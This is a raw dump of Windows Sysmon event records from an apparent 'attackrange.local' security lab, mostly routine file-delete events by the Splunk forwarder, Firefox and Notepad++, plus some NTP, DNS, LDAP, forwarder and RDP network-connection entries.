Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BC186EB0DDC9742DF25A70168095FA2D,SHA256=C7B4CA534133B3279E6522DE6CDD135E922FA9E9BC68AD0E0777CA6ED04F3B1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=948669950AA0639BA16CED89FA1B6B95,SHA256=F977063EECB3E891A24AA697ADD82205E287030533D849880AB061ADE5337019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=70E33C90C2D081F5FB90D1DED3FF0D5F,SHA256=DC5F3191284F9983E9AECB37B99756AE439F2889D3428B22DD90F5F4AE341B58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F859949E100585A6AD76A00602767B85,SHA256=A8185FA31199A4DC22E795A3CFC652BA633BDA6591978A74A85D7F09BDE8F596,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.780{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-890.attackrange.local123ntpfalse169.254.169.123-123ntp 23542300x80000000000000001047967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:04.781{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAFE68457124CD4900FD9E4DDA484FFE,SHA256=5D14EB3AA6E7E4AAA88A21A49ED5D3BD2D2DFC8CC4E6C9AA9DD0B301234E24E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807142Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:03.510{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57235-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000807141Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:03.247{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-25325-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807140Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:04.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF6A41A543839494246A28B65C9C3813,SHA256=C5BDBA0769A8310A27E2C18B5EBF3850CBFC401169CCA8A35E376C7136DA427F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807139Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:04.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=227B677EA547B73F55CC09286F12329C,SHA256=475B57A627440797C48F0580DA53B542A066934E3B14515039374F0167B7733C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807138Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:04.318{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01D01FC0A5FF535792746897E525AFCD,SHA256=67E9AB706D58B0E6552C320F20F00E41AB899F002E9061196242460AB26DA0D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:04.218{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=FDDA9697335DAA8510A1DD6EFF615B73,SHA256=5CC54205F6C9B9D1545ADD7D1423516F9EB31E241293FEC24BFC82E3D9FF5F4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:55.997{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local60931- 23542300x80000000000000001047969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:05.799{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D73F715E3FC3CA9616B1500FEAC208A,SHA256=B0B2414DEDA3D7B5E400AD5EC5BFE1E32A1784D9A8B1A1B4A9526B0207A318A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807143Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:05.334{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3517221302AE5F4308927D23BD0F05C1,SHA256=AB5BBB56DA4D10C1825D1FB514995CF064FABE61EF2D028C172F26E64C727E95,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:56.907{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57235-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001047970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:06.817{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1187C10BE33016A9F89BD77EC9C4E0E9,SHA256=EFD9695BD315F7B8CB796D3097D594999EE37F76B9C4BA6B7A91AB0C8A2F3D9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807144Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:06.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B69DCB104D00E494E26E41848CA7294F,SHA256=58D0575B8BFCADC1A445786222978592CF553D0F17966951BE88DABF0B73BD47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:07.818{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4641F5A4E859D20ED45ED9BC240A5E6,SHA256=AE071D04D67BCC041EDFFEDF788465B86DF149228F458A814BA52FF8675CABAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807146Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:07.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EA7A72D23883D995585D188B78F1C49,SHA256=BC5BA9FF8F19266FCE2AD1F0075BA2FC0A74E8CD460D0FB1137F257B2F81E9F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:58.747{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50995-false10.0.1.12-8000- 354300x8000000000000000807145Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:05.357{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57236-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:08.833{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B2438FA0AB9460151DDB091CEEF4B0C,SHA256=2A36E10EF8836252BF8C990A3391292FB91486AE4D1B8CC6D91D2E91B1DAD715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807147Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:08.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED15D4BD246B266334ADE8E1DC79CA7D,SHA256=30722581349AEC36EC44C07BB4BFBB3414E8CD0FD767771308688FFE97424B9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:59.728{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61036- 23542300x80000000000000001047975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:09.864{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB89C39A0A073C3AA68FF6B9B4608CCB,SHA256=1DA8732E5D3773BBE6F03FAA86F8919AC9584E8B843C0A1EA3A15C3489566A18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807148Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:09.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=751EC5D12AC00B21577115AF62F13115,SHA256=60E09EFA41E256C3CF96828C5233AAC929EC6C6A41D8C06D99D68458D0B18933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:10.879{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=870AD9F5750208247BBD90DD94CC7E45,SHA256=772AB45755ABE9F6DF0C9B1C4F8A682A34C5FE4F7DEB7C6CD97B50F6D6CEB8DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807149Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:10.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DB8D08D59D3E4D2F4F8D0C4761D46DC,SHA256=B15784723A78C4A33CDD714AAE5B98F055285E0C6570C07DA57357C1BD465D41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:11.896{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EFED3CAD70B377B02FD020A1C6BBB52,SHA256=A5660F892B216609713386598974EE4D202B96340FFB43805F41E127ADDD6299,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807150Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:11.396{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=335578B49D2DDE4E5E14BEA8C3B8D3C8,SHA256=C09161E7081D4FF557E43F7835301DCB27CD9DDE3D184B001AB307FCE5965ED6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:11.232{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=3A9EC2524549B04312FE32017C39A125,SHA256=9AAEBAE292877A21577EE539D4E5C472215A2508C111B4CFC255539D1E4C5A70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:12.915{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAAB5874458AA479B5AF4D61D27018CC,SHA256=4F1F14A73C114F623A241749A3CD03F3C5B93E67FC44AD4E814351E3422AF59E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807151Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:12.412{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A215CAFB5913E88F585E56668A4485D7,SHA256=053933FA43B7D0A16967CC348C3C60E314A61F157635B67C68D1CB75BA63AEA2,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001047980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:12.395{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txt2021-07-09 11:40:00.447 23542300x80000000000000001047979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:12.394{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txtMD5=91624699EB6D588C19203B284A0D6A52,SHA256=F2CC627064B5D0D8DEB4031479EB4A39174BBFCCBDEF6C0E4365A761F38D4D14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:13.929{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77D5FD8A8BB18C83EB9DC2694BCD73CF,SHA256=5519A4FBC63B1A84439C9E01C355038472132275D5A6D72333148C82B440078C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807153Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:13.427{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74C34613E7827387AAAE68F3B6C56B85,SHA256=BB481E6F72C0DCCD891F7E320734A2904DE22BEF9647E2C5A57DF643EF8604DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:04.741{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50996-false10.0.1.12-8000- 354300x8000000000000000807152Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:11.310{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57237-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:14.960{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BC36CC4171005809B87450C358035FA,SHA256=07976DFC390671EF8593E569C20A43B1231551F6B709A1E24B3D9A385A10A9E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807154Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:14.435{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4036C9658468EF76F9461EFFE15DFDA9,SHA256=E21DCA895B4A77F02EA104B91FCA3021733314FF27C9D40BD4A6200FAA50A065,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:15.974{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F848687823BDC0E4BAD3087B08D3298,SHA256=682E57EE481AC67A2A2E94C326632B62E423E9F0BE811823AFC6E97E23ECDA8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807155Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:15.450{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9AEC6D407431A86C2606D57F6DFD45F,SHA256=148F7E49E74B78EE0C0CC38875134D1C6D10CF8101CD20CFE0134C2DE0914400,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:15.396{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A7B4F8ADF72ECEDB6D0BCD4318509E9,SHA256=6238318A3A91D0799E84E7F08899BAF2665DFD3CDD8EF0A42F65B118354B93F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:15.395{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A825D4F8EC48B891781CD4158FB931C4,SHA256=E8E8B9DBB2050CFDC3D9FDC802A21817587CF12538677840C3A128F0855EFC91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:16.995{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84CD0ACF60C85C81B1E67ADF6440EF22,SHA256=03FDFCF32945A0902D5E0DD876F4B8A0A74F6B5FD756CBD318E95E15F7F95558,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807156Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:16.450{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DFC17434AEF518764912B5C3E13C3FB,SHA256=90514F6BB59831B646F37BFBB2170971173288CFCED271CE1ADFC2BADFAA09CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:07.923{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50997-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001047988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:07.923{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50997-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x8000000000000000807157Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:17.466{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0586BFCF4D116260D0279E250819966,SHA256=37591BACC3F9F36253B6867C51C74D12D4CD613A4640113BB9120F28B417F156,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807159Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:18.482{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=707BE530D0C3459AE4095E85891872C9,SHA256=23CE719E3EDC8D22EE258AB863BAC9AA7F4E22FBE2A4CC9086557E10BA09D0B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:18.241{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=7682ED7DF69F38A3484028AA4BD7D74B,SHA256=B50787BAB66B72C291E9EB98A39508311943BFCB658A295DB04C6B997D26E1AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:18.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:18.010{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
